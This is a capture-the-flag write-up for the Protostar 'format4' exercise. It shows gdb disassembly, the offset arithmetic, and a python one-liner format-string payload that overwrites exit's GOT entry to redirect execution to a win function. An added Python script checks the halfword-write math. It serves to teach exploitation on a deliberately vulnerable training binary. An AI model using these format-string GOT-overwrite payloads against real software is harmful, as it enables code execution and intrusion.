(gdb) disas vuln
Dump of assembler code for function vuln:
0x080484d2 <vuln+0>: push ebp
0x080484d3 <vuln+1>: mov ebp,esp
0x080484d5 <vuln+3>: sub esp,0x218
0x080484db <vuln+9>: mov eax,ds:0x8049730
0x080484e0 <vuln+14>: mov DWORD PTR [esp+0x8],eax
0x080484e4 <vuln+18>: mov DWORD PTR [esp+0x4],0x200
0x080484ec <vuln+26>: lea eax,[ebp-0x208]
0x080484f2 <vuln+32>: mov DWORD PTR [esp],eax
0x080484f5 <vuln+35>: call 0x804839c <fgets@plt>
0x080484fa <vuln+40>: lea eax,[ebp-0x208]
0x08048500 <vuln+46>: mov DWORD PTR [esp],eax
0x08048503 <vuln+49>: call 0x80483cc <printf@plt>
0x08048508 <vuln+54>: mov DWORD PTR [esp],0x1
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) disas hello
Dump of assembler code for function hello:
0x080484b4 <hello+0>: push ebp
0x080484b5 <hello+1>: mov ebp,esp
0x080484b7 <hello+3>: sub esp,0x18
0x080484ba <hello+6>: mov DWORD PTR [esp],0x80485f0
0x080484c1 <hello+13>: call 0x80483dc <puts@plt>
0x080484c6 <hello+18>: mov DWORD PTR [esp],0x1
0x080484cd <hello+25>: call 0x80483bc <_exit@plt>
End of assembler dump.
(gdb) x/s 0x80485f0
0x80485f0: "code execution redirected! you win"
(gdb)
It looks like we are supposed to call the hello function.. I guess swapping out the function called at vuln+49 should do it
First, the GOT entry for printf is 0x804971c, and hello is at 0x80484b4
Overwrite the printf GOT slot with hello's address and it should work.
Since an address has to be overwritten, let's split it in two: 0x84b4 goes into 0x804971c and 0x0804 goes into 0x804971e..
0x804971c => %33972d
0x804971e => %2052d
Putting the payload together, roughly:
"\x1e\x97\x04\x08" + "\x1c\x97\x04\x08" +
"%2044d" (minus the 8 leading bytes) +
"%4$hn" (argument number 4; %hn is half of %n, used when changing 2 bytes) +
"%31920d" (minus the leading 8 bytes and the 2044 bytes) +
"%5$hn" (argument number 5)
I tried it this way but it didn't work. Maybe because it's printf; anyway, I tried again by changing exit's GOT instead
0x0804850f <vuln+61>: call 0x80483ec <exit@plt>
End of assembler dump.
(gdb) x/10i 0x80483ec
0x80483ec <exit@plt>: jmp *0x8049724
user@protostar:/opt/protostar/bin$ python -c 'print "\x26\x97\x04\x08" +
"\x24\x97\x04\x08"+"%2044d"+"%4$hn"+"%31920d"+"%5$hn"' | ./format4
...(output omitted)...
-1208122336
code execution redirected! you win
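As an added check of the arithmetic in the writeup (this is not code from the original post): the Python model below replays printf's output counter over the two payloads and confirms that the pair of %hn writes reassembles to hello's address 0x080484b4 in the GOT slot. It assumes, as the writeup found by trial, that the first embedded address is positional argument 4, and that no address byte happens to be '%'.

```python
import re
import struct

HELLO = 0x080484b4       # address of hello() from the disassembly above
PRINTF_GOT = 0x0804971c  # GOT slots named in the writeup
EXIT_GOT = 0x08049724

def hn_widths(value, prefix_len):
    """Field widths for two %hn writes of `value` once `prefix_len` bytes are
    already on printf's output counter. The counter only grows, so the smaller
    halfword must be written first; returns (first_width, second_width).
    For hello with the 8 address bytes in front this gives (2044, 31920)."""
    first, second = sorted([value >> 16, value & 0xFFFF])
    return (first - prefix_len) % 0x10000, (second - first) % 0x10000

def simulate_hn_writes(payload, first_argno=4):
    """Model printf's output counter for a payload shaped like the writeup's:
    little-endian 4-byte addresses, then %<width>d padding and %<k>$hn writes.
    Assumption: the first address sits at positional argument `first_argno`.
    Returns {address: halfword written}."""
    addrs = []
    while not payload[len(addrs) * 4:].startswith(b'%'):
        addrs.append(struct.unpack_from('<I', payload, len(addrs) * 4)[0])
    count = len(addrs) * 4           # the address bytes are echoed literally
    writes = {}
    for num, kind in re.findall(rb'%(\d+)(d|\$hn)', payload):
        if kind == b'd':
            count += int(num)        # %<width>d pads to at least `width` chars;
        else:                        # the 11-char value printed never exceeds it
            writes[addrs[int(num) - first_argno]] = count & 0xFFFF
    return writes

def got_entry(writes, got):
    """Reassemble the 4-byte GOT slot from its two halfword writes."""
    return writes[got] | (writes[got + 2] << 16)

def page_payload(got):
    """The writeup's format string for a given GOT slot (constructed here)."""
    return (struct.pack('<I', got + 2) + struct.pack('<I', got)
            + b'%2044d%4$hn%31920d%5$hn')

if __name__ == '__main__':
    for name, got in (('printf', PRINTF_GOT), ('exit', EXIT_GOT)):
        w = simulate_hn_writes(page_payload(got))
        print(f'{name}@got -> {got_entry(w, got):#010x}')
```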
ref.
$-flag : http://research.hackerschool.org/Datas/Research_Lecture/FSBv1.txt
https://www.exploit-db.com/docs/28476.pdf